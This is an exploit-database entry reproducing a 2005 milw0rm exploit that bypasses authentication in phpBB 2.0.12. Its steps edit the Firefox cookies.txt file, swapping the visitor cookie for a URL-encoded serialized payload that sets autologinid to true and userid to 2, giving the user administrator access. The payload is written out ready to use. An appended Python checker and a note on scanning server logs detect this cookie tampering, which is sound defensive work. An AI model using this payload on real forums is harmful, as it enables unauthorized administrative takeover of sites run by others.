Vendor: phpBB
By: Ali7
CVSS: 5.5 (MEDIUM)
Title: Session Handling Authentication Bypass
CWE: 287
Product Name: phpBB
Affected Version From: phpBB 2.0.12
Affected Version To: phpBB 2.0.12
Patch Exists: NO
Platforms Tested:
2005

phpBB 2.0.12 Session Handling Authentication Bypass

This exploit allows an attacker to bypass authentication in phpBB 2.0.12 without registering on the victim's forum. By manipulating the cookie data, the attacker can gain high-level permissions and access the Administration Panel.

Mitigation:

Upgrade to a newer version of phpBB that includes a fix for this vulnerability.

Exploit-DB raw data:

phpBB 2.0.12 Session Handling Authentication Bypass ..
 
easy to use exploit ..
 
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
 
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
 
3- Close the Browser ..
 
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example ;)
 
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
 
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
 
save the cookies.txt..
 
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! :D
 
complete the mission by clicking " Go to Administration Panel "
 
--------------------------------------------------------------------------------
 
written by : Ali7
e-mail : ali7@hotmail.co.uk

# milw0rm.com [2005-03-11]
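
The modified cookie above differs from the visitor cookie in one structural way a defender can test for: once URL-decoded, `autologinid` is serialized as a boolean (`b:1`) instead of a string. The following check is an added example, not part of the original advisory or of phpBB's code; the function names, the `STRING_KEY` sample and the rule that a legitimate `autologinid` is always a string are assumptions made for illustration.

```python
from urllib.parse import unquote

def parse(s, i=0):
    """Parse one PHP-serialized value at offset i -> (value, next offset).
    Handles only N, b, i, s, a; string lengths assume ASCII content."""
    t = s[i]
    if t == "N":
        return None, i + 2                       # N;
    if t in "bi":
        end = s.index(";", i)
        n = int(s[i + 2:end])
        return (bool(n) if t == "b" else n), end + 1
    if t == "s":
        colon = s.index(":", i + 2)
        start = colon + 2                        # skip :"
        stop = start + int(s[i + 2:colon])
        return s[start:stop], stop + 2           # skip ";
    if t == "a":
        colon = s.index(":", i + 2)
        count = int(s[i + 2:colon])
        i, out = colon + 2, {}                   # skip :{
        for _ in range(count):
            key, i = parse(s, i)
            out[key], i = parse(s, i)
        return out, i + 1                        # skip }
    raise ValueError(f"unsupported type {t!r} at offset {i}")

def check_cookie(raw):
    """Return findings for one URL-encoded phpbb2mysql_data cookie value."""
    text = unquote(raw)
    try:
        data, end = parse(text)
    except (ValueError, IndexError):
        return ["unparseable"]
    if not isinstance(data, dict) or end != len(text):
        return ["unparseable"]
    auto = data.get("autologinid")
    # Assumption: a genuine autologinid is always a serialized string.
    if "autologinid" in data and not isinstance(auto, str):
        return [f"autologinid is {type(auto).__name__}, not str"]
    return []

VISITOR = "a%3A0%3A%7B%7D"                                    # from the page
MODIFIED = ("a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B"
            "s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D")   # from the page
# Constructed sample: a cookie whose autologinid is a string.
STRING_KEY = 'a:2:{s:11:"autologinid";s:4:"abcd";s:6:"userid";s:1:"5";}'

if __name__ == "__main__":
    for name in ("VISITOR", "MODIFIED", "STRING_KEY"):
        print(name, check_cookie(globals()[name]))
```

The same type test can be applied to cookie values recorded in web server or proxy logs to find requests that carried a non-string `autologinid`.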